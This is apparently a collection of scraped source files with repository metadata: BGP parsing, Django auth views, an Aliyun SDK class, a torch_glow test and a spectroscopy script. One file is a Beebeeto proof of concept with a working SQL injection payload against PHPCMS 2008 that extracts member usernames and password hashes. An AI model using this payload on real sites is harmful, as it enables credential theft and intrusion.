                prefix_data = [ord(i) for i in tmp]
            # Zero the remaining bits in the last octet if it didn't fall
            # on an octet boundary
            if remainder > 0:
                prefix_data[-1] &= 255 << (8 - remainder)
            # pad with '0' entries so short prefixes still yield 4 octets
            prefix_data = prefix_data + list(str(0)) * 4
            prefix = "%s.%s.%s.%s" % (tuple(prefix_data[0:4])) + '/' + str(prefix_len)
            if not addpath:
                prefixes.append(prefix)
            else:
                prefixes.append({'prefix': prefix, 'path_id': path_id})
            # Next prefix
            postfix = postfix[octet_len + 1:]
        return prefixes

    @staticmethod
    def parse_attributes(data, asn4=False):
        """
        Parses an RFC4271 encoded blob of BGP attributes into a list
        :param data: raw path-attributes bytes
        :param asn4: support 4 bytes asn or not
        :return: dict mapping attribute type code -> decoded value
        """
        attributes = {}
        postfix = data
        while len(postfix) > 0:
            try:
                flags, type_code = struct.unpack('!BB', postfix[:2])
                if flags & AttributeFlag.EXTENDED_LENGTH:
                    # extended-length flag set: 2-octet length field
                    attr_len = struct.unpack('!H', postfix[2:4])[0]
                    attr_value = postfix[4:4 + attr_len]
                    postfix = postfix[4 + attr_len:]  # Next attribute
                else:  # standard 1-octet length
                    if isinstance(postfix[2], int):
                        attr_len = postfix[2]
                    else:
                        attr_len = ord(postfix[2])
                    attr_value = postfix[3:3 + attr_len]
                    postfix = postfix[3 + attr_len:]  # Next attribute
            except Exception as e:
                LOG.error(e)
                error_str = traceback.format_exc()
                LOG.debug(error_str)
                raise excep.UpdateMessageError(
                    sub_error=bgp_cons.ERR_MSG_UPDATE_MALFORMED_ATTR_LIST,
                    data='')
            # dispatch on attribute type; unknown types are kept as hex
            if type_code == bgp_cons.BGPTYPE_ORIGIN:
                decode_value = Origin.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_AS_PATH:
                decode_value = ASPath.parse(value=attr_value, asn4=asn4)
            elif type_code == bgp_cons.BGPTYPE_NEXT_HOP:
                decode_value = NextHop.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_MULTI_EXIT_DISC:
                decode_value = MED.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_LOCAL_PREF:
                decode_value = LocalPreference.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_ATOMIC_AGGREGATE:
                decode_value = AtomicAggregate.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_AGGREGATOR:
                decode_value = Aggregator.parse(value=attr_value, asn4=asn4)
            elif type_code == bgp_cons.BGPTYPE_COMMUNITIES:
                decode_value = Community.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_ORIGINATOR_ID:
                decode_value = OriginatorID.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_CLUSTER_LIST:
                decode_value = ClusterList.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_LINK_STATE:
                decode_value = LinkState.parse(value=attr_value).dict()[29]
            elif type_code == bgp_cons.BGPTYPE_NEW_AS_PATH:
                # AS4_PATH always carries 4-byte ASNs (RFC 6793)
                decode_value = ASPath.parse(value=attr_value, asn4=True)
            elif type_code == bgp_cons.BGPTYPE_NEW_AGGREGATOR:
                decode_value = Aggregator.parse(value=attr_value, asn4=True)
            elif type_code == bgp_cons.BGPTYPE_MP_REACH_NLRI:
                decode_value = MpReachNLRI.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_MP_UNREACH_NLRI:
                decode_value = MpUnReachNLRI.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_EXTENDED_COMMUNITY:
                decode_value = ExtCommunity.parse(value=attr_value)
            elif type_code == bgp_cons.BGPTYPE_PMSI_TUNNEL:
                decode_value = PMSITunnel.parse(value=attr_value)
            else:
                decode_value = binascii.b2a_hex(attr_value)
            attributes[type_code] = decode_value
        return attributes

    @staticmethod
    def construct_attributes(attr_dict, asn4=False):
        """
        Constructs the BGP Update path-attributes blob.
        :param attr_dict: bgp attribute dictionary (type code -> value)
        :param asn4: support 4 bytes asn or not
        """
        attr_raw_hex = b''
        # each recognised attribute type delegates to its codec class;
        # unrecognised type codes are silently skipped
        for type_code, value in attr_dict.items():
            if type_code == bgp_cons.BGPTYPE_ORIGIN:
                origin_hex = Origin.construct(value=value)
                attr_raw_hex += origin_hex
            elif type_code == bgp_cons.BGPTYPE_AS_PATH:
                aspath_hex = ASPath.construct(value=value, asn4=asn4)
                attr_raw_hex += aspath_hex
            elif type_code == bgp_cons.BGPTYPE_NEXT_HOP:
                nexthop_hex = NextHop.construct(value=value)
                attr_raw_hex += nexthop_hex
            elif type_code == bgp_cons.BGPTYPE_MULTI_EXIT_DISC:
                med_hex = MED.construct(value=value)
                attr_raw_hex += med_hex
            elif type_code == bgp_cons.BGPTYPE_LOCAL_PREF:
                localpre_hex = LocalPreference.construct(value=value)
                attr_raw_hex += localpre_hex
            elif type_code == bgp_cons.BGPTYPE_ATOMIC_AGGREGATE:
                atomicaggregate_hex = AtomicAggregate.construct(value=value)
                attr_raw_hex += atomicaggregate_hex
            elif type_code == bgp_cons.BGPTYPE_AGGREGATOR:
                aggregator_hex = Aggregator.construct(value=value, asn4=asn4)
                attr_raw_hex += aggregator_hex
            elif type_code == bgp_cons.BGPTYPE_COMMUNITIES:
                community_hex = Community.construct(value=value)
                attr_raw_hex += community_hex
            elif type_code == bgp_cons.BGPTYPE_ORIGINATOR_ID:
                originatorid_hex = OriginatorID.construct(value=value)
                attr_raw_hex += originatorid_hex
            elif type_code == bgp_cons.BGPTYPE_CLUSTER_LIST:
                clusterlist_hex = ClusterList.construct(value=value)
                attr_raw_hex += clusterlist_hex
            elif type_code == bgp_cons.BGPTYPE_MP_REACH_NLRI:
                mpreach_hex = MpReachNLRI().construct(value=value)
                attr_raw_hex += mpreach_hex
            elif type_code == bgp_cons.BGPTYPE_MP_UNREACH_NLRI:
                mpunreach_hex = MpUnReachNLRI.construct(value=value)
                attr_raw_hex += mpunreach_hex
            elif type_code == bgp_cons.BGPTYPE_EXTENDED_COMMUNITY:
                community_ext_hex = ExtCommunity.construct(value=value)
                attr_raw_hex += community_ext_hex
        return attr_raw_hex

    @staticmethod
    def construct_header(msg):
        """
        Prepends the mandatory header to a constructed BGP message
        :param msg: message body bytes
        :return: full wire message (marker + length + type 2 + body)
        """
        #    16-octet     2-octet  1-octet
        # ---------------+--------+---------+------+
        #    Maker       | Length |  Type   |  msg |
        # ---------------+--------+---------+------+
        # length counts the 19-byte header itself; type 2 == UPDATE
        return b'\xff'*16 + struct.pack('!HB', len(msg) + 19, 2) + msg

    @staticmethod
    def construct_prefix_v4(prefix_list, add_path=False):
        """
        constructs NLRI prefix list
        :param prefix_list: prefix list (strings "a.b.c.d/len", or dicts
            with 'prefix'/'path_id' when add_path is on)
        :param add_path: support add path or not
        """
        nlri_raw_hex = b''
        for prefix in prefix_list:
            if add_path and isinstance(prefix, dict):
                path_id = prefix.get('path_id')
                prefix = prefix.get('prefix')
                nlri_raw_hex += struct.pack('!I', path_id)
            masklen = prefix.split('/')[1]
            ip_hex = struct.pack('!I', netaddr.IPNetwork(prefix).value)
            masklen = int(masklen)
            # emit only as many address octets as the mask length requires
            if 16 < masklen <= 24:
                ip_hex = ip_hex[0:3]
            elif 8 < masklen <= 16:
                ip_hex = ip_hex[0:2]
            elif masklen <= 8:
                ip_hex = ip_hex[0:1]
            nlri_raw_hex += struct.pack('!B', masklen) + ip_hex
        return nlri_raw_hex
| [
"xiaoquwl@gmail.com"
] | xiaoquwl@gmail.com |
30b607ac4c0ea0c052d4efeeabd5863ce8ad5d02 | 854394f4148e7bee8cd3c6d2a01e97ffbf772103 | /0x0A-python-inheritance/100-my_int.py | 4c939bd416117895b5cbd983bf6c85632d952eed | [] | no_license | garethbrickman/holbertonschool-higher_level_programming | cb3ccb864102d62af72b5e86d53638bd899bfabb | 05d65c6c89008cb70cbc1ada5bb9c8ed7a2733e9 | refs/heads/master | 2021-07-10T08:32:23.397388 | 2020-10-15T18:40:55 | 2020-10-15T18:40:55 | 207,379,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/python3
"""
Class for MyInt
"""
class MyInt(int):
    """Integer subclass that also records its initial value as ``self.int``."""

    def __init__(self, value):
        """Record the wrapped value.

        The actual integer value is fixed by ``int.__new__`` before this
        runs; ``__init__`` only stores the argument as an attribute.

        Args:
            value: the number this MyInt represents.
        """
        # Parameter renamed from ``int`` — the original shadowed the
        # builtin type inside this method.
        super().__init__()
        self.int = value
| [
"977@holbertonschool.com"
] | 977@holbertonschool.com |
91daa7e071b04676a4a5ef9324c7c921ce8d1724 | f7ff9607822bb8f347598c10d185941cf1956852 | /aliyun-python-sdk-facebody/aliyunsdkfacebody/request/v20191230/GetBodyPersonRequest.py | 8f62bb24d7e1e9f501ad532c6eb1173a0ec918cd | [
"Apache-2.0"
] | permissive | djzqbx001/aliyun-openapi-python-sdk | 5ca32201c578528f4b4228c7636b36c3f60a7c60 | 7d2e3c854c4d70ed341f036f5f7be0310216c303 | refs/heads/master | 2023-09-06T10:17:55.489439 | 2021-11-19T04:26:37 | 2021-11-19T04:26:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,563 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkfacebody.endpoint import endpoint_data
class GetBodyPersonRequest(RpcRequest):
	"""RPC request wrapper for the facebody ``GetBodyPerson`` API (version 2019-12-30)."""
	def __init__(self):
		RpcRequest.__init__(self, 'facebody', '2019-12-30', 'GetBodyPerson')
		self.set_method('GET')
		# Older SDK cores lack endpoint maps, hence the hasattr guards.
		if hasattr(self, "endpoint_map"):
			setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
		if hasattr(self, "endpoint_regional"):
			setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
	def get_PersonId(self):
		# 'PersonId' query parameter: identifier of the person record to read.
		return self.get_query_params().get('PersonId')
	def set_PersonId(self,PersonId):
		self.add_query_param('PersonId',PersonId)
	def get_DbId(self):
		# 'DbId' query parameter: identifier of the database the person belongs to.
		return self.get_query_params().get('DbId')
def set_DbId(self,DbId):
self.add_query_param('DbId',DbId) | [
"sdk-team@alibabacloud.com"
] | sdk-team@alibabacloud.com |
3c3ab58037a0242827c23176c1faadb16196997d | be7bb6d0cbdb27d3ff72830dc9cce41b170b27fe | /0x02-python-import_modules/101-easy_print.py | 0f9d43b5028f6f9044a2a3cf6d6abfff4ba5fdcb | [] | no_license | camagar/holbertonschool-higher_level_programming | 21a8e7c2a2ad07c694c5443e174bb70502f910c2 | 97dd2fade6fb64ac7d9c52e412c0b8c1b8dfc3de | refs/heads/master | 2023-04-07T21:38:00.071687 | 2021-04-14T02:11:42 | 2021-04-14T02:11:42 | 291,889,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | #!/usr/bin/python3
import iscool
| [
"mauriciogrestrepo@gmail.com"
] | mauriciogrestrepo@gmail.com |
d41e07b6b493159c8e8f0b0dbd4c5a75389917d1 | e77a3618d0afe63a2f00d87b61c3f19d3eba10d8 | /plugins/beebeeto/poc_2014_0115.py | dc729f19c5425e035250f73a0c2b0ebc24b7ef11 | [] | no_license | Explorer1092/coco | b54e88a527b29209de7c636833ac5d102514291b | 15c5aba0972ac68dc4c874ddacf5986af5ac2a64 | refs/heads/master | 2020-05-31T07:03:19.277209 | 2019-01-29T14:36:45 | 2019-01-29T14:36:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,141 | py | #!/usr/bin/env python
# coding=utf-8
"""
Site: http://www.beebeeto.com/
Framework: https://github.com/n0tr00t/Beebeeto-framework
"""
import re
import urllib2
from baseframe import BaseFrame
class MyPoc(BaseFrame):
    """Beebeeto PoC for the PHPCMS 2008 /preview.php SQL injection (Python 2 code)."""
    poc_info = {
        # PoC metadata (id, name, author, creation date)
        'poc': {
            'id': 'poc-2014-0115',
            'name': 'PHPCMS 2008 /preview.php SQL注入漏洞 POC',
            'author': '1024',
            'create_date': '2014-10-25',
        },
        # Protocol information
        'protocol': {
            'name': 'http',
            'port': [80],
            'layer4_protocol': ['tcp'],
        },
        # Vulnerability information
        'vul': {
            'app_name': 'PHPCMS',
            'vul_version': ['2008'],
            'type': 'SQL Injection',
            'tag': ['PHPCMS漏洞', 'SQL注入漏洞', '/preview.php', 'php'],
            'desc': 'N/A',
            'references': ['http://www.wooyun.org/bugs/wooyun-2013-022112',
                           ],
        },
    }
    @classmethod
    def verify(cls, args):
        """Probe the target for the injection; on success store the extracted
        credentials in args['poc_ret'] and set args['success']."""
        # Error-based injection: a duplicate-key MySQL error leaks
        # username:password from phpcms_member into the response body.
        payload = ("/preview.php?info[catid]=15&content=a[page]b&info[contentid]=2'%20and%20(select%201%20from("
                   "select%20count(*),concat((select%20(select%20(select%20concat(0x7e,0x27,username,0x3a,password,"
                   "0x27,0x7e)%20from%20phpcms_member%20limit%200,1))%20from%20information_schema.tables%20limit%200"
                   ",1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)--%20a")
        verify_url = args['options']['target'] + payload
        req = urllib2.Request(verify_url)
        if args['options']['verbose']:
            print '[*] Request URL: ' + verify_url
        content = urllib2.urlopen(req).read()
        # Match the leaked "~'user:pass'~" fragment inside the MySQL error text.
        reg = re.compile("Duplicate entry '~'(.*?)'~1' for key 'group_key'")
        res = reg.findall(content)
        if res:
            args['success'] = True
            args['poc_ret']['vul_url'] = verify_url
            args['poc_ret']['Admin_pwd'] = res[0]
        return args
    # Beebeeto convention: exploit mode reuses the verification routine.
    exploit = verify
if __name__ == '__main__':
from pprint import pprint
mp = MyPoc()
pprint(mp.run()) | [
"834430486@qq.com"
] | 834430486@qq.com |
33c640404f61f1578eabdb131983ea14b43007c2 | 93a13468fd34692ca58ec5aad8f923a5097a19a5 | /users/views.py | e2150174780cec0192b483daaa9b2f09e459b8a2 | [] | no_license | Ryanden/AirBnB-Clone | 0734735a5f1e38b2670db12a4aeb81a2ccb8dc71 | a9be3a6f2cda3c11f036c5f8a31b0c972ed77905 | refs/heads/master | 2023-04-29T07:10:10.177262 | 2021-02-16T13:48:33 | 2021-02-16T13:48:33 | 232,119,018 | 0 | 0 | null | 2023-04-21T21:14:19 | 2020-01-06T14:32:18 | Python | UTF-8 | Python | false | false | 1,532 | py | from django.views import View
from django.views.generic import FormView
from django.shortcuts import render, redirect, reverse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from . import forms
class LoginView(View):
    """Display the e-mail/password login form (GET) and authenticate it (POST)."""

    def get(self, request):
        """Render an unbound login form."""
        context = {"form": forms.LoginForm()}
        return render(request, "users/login.html", context)

    def post(self, request):
        """Validate the submitted credentials; log in and go home on success."""
        form = forms.LoginForm(request.POST)
        if not form.is_valid():
            return render(request, "users/login.html", {"form": form})
        credentials = form.cleaned_data
        user = authenticate(
            request,
            username=credentials.get("email"),
            password=credentials.get("password"),
        )
        if user is None:
            # Bad credentials: redisplay the bound form with its errors.
            return render(request, "users/login.html", {"form": form})
        login(request, user)
        return redirect(reverse("core:home"))
def log_out(request):
    """Terminate the current session, then send the visitor to the home page."""
    logout(request)
    home_url = reverse("core:home")
    return redirect(home_url)
class SignUpView(FormView):
    """Create a new account and immediately authenticate the fresh user."""

    template_name = "users/signup.html"
    form_class = forms.SignUpForm
    success_url = reverse_lazy("core:home")
    # Pre-filled demo values shown in the empty form.
    initial = {"first_name": "test", "last_name": "guest", "email": "test@gmail.com"}

    def form_valid(self, form):
        """Persist the user, log them in, then defer to FormView's redirect."""
        form.save()
        cleaned = form.cleaned_data
        user = authenticate(
            self.request,
            username=cleaned.get("email"),
            password=cleaned.get("password"),
        )
        if user is not None:
            login(self.request, user)
        return super().form_valid(form)
| [
"lockstom@gmail.com"
] | lockstom@gmail.com |
b53e1d637c5aada77f90884734c81edc8fe7d932 | d5bc5ad0aa9276c661adfffe0acbe8b3211b39e4 | /torch_glow/tests/functionality/quantized_cut_in_the_middle_test.py | 5b9260be64fc135f8e6585d3c9cf1b5472c2371b | [
"Apache-2.0"
] | permissive | xw285cornell/glow | b3ec6f84be6485e5b55550c97566d11512e92167 | 90b5badcf583c0cdd880d263a687ae387bcbbb72 | refs/heads/master | 2022-12-06T05:49:09.743232 | 2020-09-04T07:34:59 | 2020-09-04T07:36:17 | 292,919,567 | 0 | 0 | Apache-2.0 | 2020-09-04T18:28:14 | 2020-09-04T18:28:13 | null | UTF-8 | Python | false | false | 2,078 | py | # isort:skip_file
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch_glow
import torch
from tests.utils import GLOW_NODE_NAME
class TestQuantizedCut(unittest.TestCase):
    def test_quantized_cut(self):
        """Test cut quantized chunk in the middle."""
        # Disable the profiling executor so tracing yields a stable graph.
        torch._C._jit_set_profiling_executor(False)
        torch._C._jit_set_profiling_mode(False)
        def fun(a, b, c, d):
            # Quantize four inputs, combine them through quantized adds,
            # and dequantize the final result back to float.
            q = torch.nn.quantized.Quantize(
                scale=1.0 / 21, zero_point=0, dtype=torch.quint8
            )
            dq = torch.nn.quantized.DeQuantize()
            a = q(a)
            b = q(b)
            c = q(c)
            d = q(d)
            adds = torch.ops.quantized.add(a, b, scale=1.0 / 17, zero_point=5)
            adds2 = torch.ops.quantized.add(c, d, scale=1.0 / 14, zero_point=4)
            res = torch.ops.quantized.add_relu(
                adds, adds2, scale=1.0 / 18, zero_point=6
            )
            res = torch.ops.quantized.add(res, res, scale=1.0 / 13, zero_point=7)
            res = dq(res)
            return res
        with torch.no_grad():
            a = torch.randn([5, 5])
            b = torch.randn([5, 5])
            c = torch.randn([5, 5])
            d = torch.randn([5, 5])
            # Reference result from eager-mode PyTorch.
            res_torch = fun(a, b, c, d)
            torch_glow.enableFusionPass()
            # Cut using blacklist functionality
            blacklist = ["quantized::add_relu"]
            torch_glow.setFusionBlacklist(blacklist)
            traced_model = torch.jit.trace(fun, (a, b, c, d))
            for node in traced_model.graph_for(a, b, c, d).nodes():
                kind = node.kind()
                # Make sure the blacklist is working: every remaining node
                # is either a fused Glow subgraph, the blacklisted op, or a
                # constant.
                assert (
                    kind == GLOW_NODE_NAME
                    or kind in blacklist
                    or kind == "prim::Constant"
                )
            res_glow = traced_model(a, b, c, d)
            print(res_torch)
            print(res_glow)
            # The split Glow execution must match eager PyTorch numerically.
            assert torch.allclose(res_torch, res_glow)
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
be81e9c26fcc8071cfffa694007f998c4194f36b | 4f0a7a6942003a928037a68ac7ba6f1afb5c30c7 | /mysite/api/serializers.py | 5f3243b80ddf585f0dd9f12f458ec4edf4c4458d | [] | no_license | UPstartDeveloper/learn-django-live | 20230fb1930420bbc9c5b12a50659a9476ab830d | 94f6eea08de321b1cc41c17571cf36bdb5ee9a7e | refs/heads/master | 2023-05-06T10:18:14.990145 | 2022-04-29T15:31:15 | 2022-04-29T15:31:15 | 216,932,883 | 0 | 0 | null | 2023-04-21T20:41:16 | 2019-10-23T00:18:09 | Python | UTF-8 | Python | false | false | 319 | py | from rest_framework.serializers import ModelSerializer
from polls.models import Question, Choice
class QuestionSerializer(ModelSerializer):
    """Serialize every field of the polls ``Question`` model."""
    class Meta:
        model = Question
        fields = '__all__'
class ChoiceSerializer(ModelSerializer):
    """Serialize every field of the polls ``Choice`` model."""
    class Meta:
        model = Choice
        fields = '__all__'
| [
"zainr7989@gmail.com"
] | zainr7989@gmail.com |
3f6b69f20b7796bfb25dcb7c59db2b97b1d8faf1 | 1ab903cf2e439919e208db6a1ea85b95fc447eb6 | /classifier_preprocessor_quality_factor.py | 041d0557ef44914a9d67d98ee552072f9081c777 | [] | no_license | shanonentropy/photonic_thermometer_intake_module | 7156e91a7e38e9f1413f1edfe6308ac773fd9613 | d3ff7b967ae6ea072bd1edc0718fe662d67b3d07 | refs/heads/main | 2023-08-25T06:26:40.189162 | 2021-10-04T18:14:38 | 2021-10-04T18:14:38 | 413,526,266 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,031 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 26 10:38:27 2019
@author: zahmed
this program is part of the SENSOR_CLASSIFIER program's pre-processing routine
it will take in all the data from the sensor folder and display it
"""
import os
import pandas as pd
from sklearn.preprocessing import minmax_scale
from scipy import interpolate
from scipy.interpolate import splrep, sproot
import numpy as np
import matplotlib.pyplot as plt
#path to directory with the relevant files
path_dir = r'C:\Interpolation_Project\classification\fbg_classification'
#loop over the files and then create a list of file names to later iterate over
''' for each spectra we need to extract the following set of information
number of peaks
if more than one peak, peak-to-peak distance (ppd) and delta ppd
Q of the device
from the normalized spectra, skewness
and intensity of profile of the spectra
the first part is to just feed in data with profile and label and
see if the classifier works, if not, keep adding more features
so this program will just take in the data, fit it, create a dataset with
known pitch of 0.003 nm and output minmax-scaled profile data with the
same name
'''
# Accumulators: one entry in file_names per input file, one entry in Q per
# spectrum whose FWHM could be extracted.
file_names = []
Q = []
cols = ['x', 'y']
for fname in os.listdir(path_dir):
    file_names.append(fname)
    print(fname)
    file_path = (os.path.join(path_dir, fname))
    # Spectra are tab-separated with a 4-line header; columns become x, y.
    df = pd.read_csv(file_path, sep = '\t', header = 4, engine = 'python', names =cols )
    df.sort_values(by='x', ascending =True, inplace = True)
    df.drop_duplicates( inplace =True)
#    df.plot('x','y')
#    m = df.x.count()
#    s_val = 1/(m - np.sqrt(2*m))
    tck = interpolate.splrep(df.x,df.y,s=0.0000001) # s =m-sqrt(2m) where m= #datapts and s is smoothness factor
    # Resample the smoothing spline on a uniform 0.003 nm grid.
    x_ = np.arange (df.x.min(),df.x.max(), 0.003)
    y_ = interpolate.splev(x_, tck, der=0)
#    plt.plot(df['x'],df['y'])
#    plt.scatter(x_,y_)
#    plt.show()
    # Half-maximum level; roots of (spline - HM) are the FWHM crossings.
    HM =(np.max(y_)-np.min(y_))/2
    w = splrep(x_, y_ - HM, k=3)
#    print(sproot(w_j))
    try:
        # Only the clean two-crossing case is handled: with any other even
        # root count the 2-tuple unpack raises ValueError, caught below.
        if len(sproot(w))%2 == 0:
            r1 , r2 = sproot(w)
#            print(r1, r2)
            FWHM = np.abs(r1 - r2)
#            print('FWHM=',FWHM)
            # Q = center wavelength / FWHM (dimensionless quality factor).
            center_wavelength = r1 + FWHM/2
            Q.append(center_wavelength/FWHM)
    except (TypeError, ValueError):
        # Spectra without exactly two half-maximum crossings are reported
        # and skipped (their name stays in file_names, see NOTE below).
        print(fname,'error')
        continue
    df1 = pd.DataFrame(y_, x_)
#    print(df1.head(3))
#    df1['x_scale'] = minmax_scale(x_, feature_range=(0,1))
#    df1['y_scale'] = minmax_scale(y_, feature_range=(0,1))
#    plt.plot(df1['x_scale'], df1['y_scale'])
#    df1.reset_index(inplace=True)
#    df1.drop('index', axis=1, inplace=True)
#    df2 = df1[['x_scale', 'y_scale']]
#    print(df2.head(3))
#    tmp = df2[['x_scale', 'y_scale']].transpose()
#    tmp = pd.DataFrame(tmp.loc['y_scale'].T).T
#    print(tmp)
#    tmp.to_csv(fname)
# NOTE(review): if any file hit the except branch above, file_names is longer
# than Q and this constructor raises ValueError — verify against real data.
# The 'filnames' spelling is preserved as the CSV column header.
df_q = pd.DataFrame({'filnames':file_names, 'quality_factor':Q})
# Output file is written without an extension.
df_q.to_csv('quality_factor')
| [
"noreply@github.com"
] | shanonentropy.noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.